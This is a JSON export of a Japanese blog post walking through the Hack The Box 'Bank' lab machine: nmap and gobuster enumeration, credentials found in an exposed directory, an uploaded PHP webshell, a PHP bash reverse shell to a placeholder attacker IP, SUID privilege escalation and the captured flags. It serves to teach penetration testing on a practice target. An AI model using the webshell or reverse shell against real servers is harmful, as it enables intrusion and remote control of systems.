{"id":3693,"date":"2020-08-02T17:49:40","date_gmt":"2020-08-02T08:49:40","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3693"},"modified":"2020-08-30T23:37:36","modified_gmt":"2020-08-30T14:37:36","slug":"hack-the-box-bank-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3693","title":{"rendered":"Hack The Box – Bank – Walkthrough"},"content":{"rendered":"

\u30c8\u30ec\u30fc\u30cb\u30f3\u30b0\u30b3\u30f3\u30c6\u30f3\u30c4\uff1a\u300cHack The Box\u300d\u3092\u89e6\u308a\u59cb\u3081\u3066\u307f\u305f<\/a>\u306e\u901a\u308a\u3001Bank\u3092\u653b\u7565\u3057\u3066\u307f\u305f\u3002<\/p>\n

Hack The Box \u306b\u63a5\u7d9a\u3057\u3066\u3001Bank\u3092\u8d77\u52d5<\/h3>\n

\"\"<\/a><\/p>\n

nmap\u306b\u306680\u756a\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d<\/h3>\n
\r\n# nmap -A -n -F -T5 bank.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-02 03:55 UTC\r\nNmap scan report for bank.htb (10.10.10.29)\r\nHost is up (0.048s latency).\r\nNot shown: 97 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n22\/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)\r\n| ssh-hostkey:\r\n|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)\r\n|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)\r\n|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)\r\n|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)\r\n53\/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)\r\n| dns-nsid:\r\n|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu\r\n80\/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))\r\n|_http-server-header: Apache\/2.4.7 (Ubuntu)\r\n| http-title: HTB Bank - Login\r\n|_Requested resource was login.php\r\n...\r\n<\/pre>\n
\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u304c\u3042\u308b\u3053\u3068\u3092\u78ba\u8a8d\u3002
\n\"\"<\/a><\/p>\n
gobuster\u306b\u3066balance-transfer\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3092\u898b\u3064\u3051\u3001\u8a8d\u8a3c\u60c5\u5831\u3092\u53d6\u5f97<\/h3>\n
\r\n# apt install gobuster seclists\r\n# gobuster dir -u http:\/\/bank.htb -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n===============================================================\r\nGobuster v3.0.1\r\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)\r\n===============================================================\r\n[+] Url:            http:\/\/bank.htb\r\n[+] Threads:        10\r\n[+] Wordlist:       \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n[+] Status codes:   200,204,301,302,307,401,403\r\n[+] User Agent:     gobuster\/3.0.1\r\n[+] Timeout:        10s\r\n===============================================================\r\n2020\/08\/02 05:37:13 Starting gobuster\r\n===============================================================\r\n\/uploads (Status: 301)\r\n\/assets (Status: 301)\r\n\/inc (Status: 301)\r\n\/server-status (Status: 403)\r\n\/balance-transfer (Status: 301)\r\n===============================================================\r\n2020\/08\/02 07:26:30 Finished\r\n===============================================================\r\n<\/pre>\n
balance-transfer\u306b\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3002\u30b5\u30a4\u30ba\u304c\u5c0f\u3055\u3044\u30d5\u30a1\u30a4\u30eb\u306b\u8a8d\u8a3c\u60c5\u5831\u304c\u5b58\u5728\u3059\u308b\u3002
\n\"\"<\/a>
\n\"\"<\/a><\/p>\n
reverseshell\u3092\u8a2d\u7f6e<\/h3>\n
\u5148\u307b\u3069\u306e\u8a8d\u8a3c\u60c5\u5831\u3067\u30ed\u30b0\u30a4\u30f3\u3059\u308b\u3068\u3001\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u30da\u30fc\u30b8\u304c\u3042\u308b\u3002\u307e\u305a\u306fwebshell\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u307f\u308b\u3002
\n\"\"<\/a><\/p>\n
\r\n<pre><?php system($_GET["cmd"]);?><\/pre>\r\n<\/pre>\n
\u30b3\u30de\u30f3\u30c9\u304c\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u306a\u308b\u3002
\n\"\"<\/a><\/p>\n
\u6b21\u306b\u30ea\u30d0\u30fc\u30b9\u30b7\u30a7\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3002<\/p>\n
\r\n<?php\r\nexec("\/bin\/bash -c 'bash -i > \/dev\/tcp\/10.10.x.x\/1234 0>&1'");\r\n<\/pre>\n
1234\u756a\u30dc\u30fc\u30c8\u3067\u5f85\u3061\u53d7\u3051\u3066\u3001\u30b7\u30a7\u30eb\u3092\u53d6\u5f97\u3059\u308b\u3002SUID\u304c\u3042\u308b\u30d5\u30a1\u30a4\u30eb\u3092\u5b9f\u884c\u3059\u308b\u3068root\u306b\u306a\u308c\u308b\u3002<\/p>\n
\r\n# nc -nvlp 1234\r\nNcat: Version 7.80 ( https:\/\/nmap.org\/ncat )\r\nNcat: Listening on :::1234\r\nNcat: Listening on 0.0.0.0:1234\r\nNcat: Connection from 172.17.0.1.\r\nNcat: Connection from 172.17.0.1:60578.\r\n\r\npwd\r\n\/var\/www\/bank\/uploads\r\n\r\nid\r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\ncat \/home\/chris\/user.txt\r\n37c97f8609f361848d8872098b0721c3\r\n\r\nfind \/ -perm -u=s -type f 2>\/dev\/null\r\n\/var\/htb\/bin\/emergency\r\n\/usr\/lib\/eject\/dmcrypt-get-device\r\n\/usr\/lib\/openssh\/ssh-keysign\r\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\r\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\r\n\/usr\/bin\/at\r\n\/usr\/bin\/chsh\r\n\/usr\/bin\/passwd\r\n\/usr\/bin\/chfn\r\n\/usr\/bin\/pkexec\r\n\/usr\/bin\/newgrp\r\n\/usr\/bin\/traceroute6.iputils\r\n\/usr\/bin\/gpasswd\r\n\/usr\/bin\/sudo\r\n\/usr\/bin\/mtr\r\n\/usr\/sbin\/uuidd\r\n\/usr\/sbin\/pppd\r\n\/bin\/ping\r\n\/bin\/ping6\r\n\/bin\/su\r\n\/bin\/fusermount\r\n\/bin\/mount\r\n\/bin\/umount\r\n\r\nid\r\nuid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)\r\n\r\ncat \/root\/root.txt\r\nd5be56adc67b488f81a4b9de30c8a68e\r\n<\/pre>\n
\u53d6\u5f97\u3057\u305f2\u3064\u306e\u30d5\u30e9\u30b0\u3092\u5165\u529b\u3057\u3066\u5b8c\u4e86\uff01<\/h3>\n
\"\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
\u30c8\u30ec\u30fc\u30cb\u30f3\u30b0\u30b3\u30f3\u30c6\u30f3\u30c4\uff1a\u300cHack The Box\u300d\u3092\u89e6\u308a\u59cb\u3081\u3066\u307f\u305f\u306e\u901a\u308a\u3001Bank\u3092\u653b\u7565\u3057\u3066\u307f\u305f\u3002 Hack The Box \u306b\u63a5\u7d9a\u3057\u3066\u3001Bank\u3092\u8d77\u52d5 nmap\u306b\u306680\u756a\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u3092\u78ba\u8a8d # nmap -A […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3693"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3693"}],"version-history":[{"count":3,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3693\/revisions"}],"predecessor-version":[{"id":3794,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3693\/revisions\/3794"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3693"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3693"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3693"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}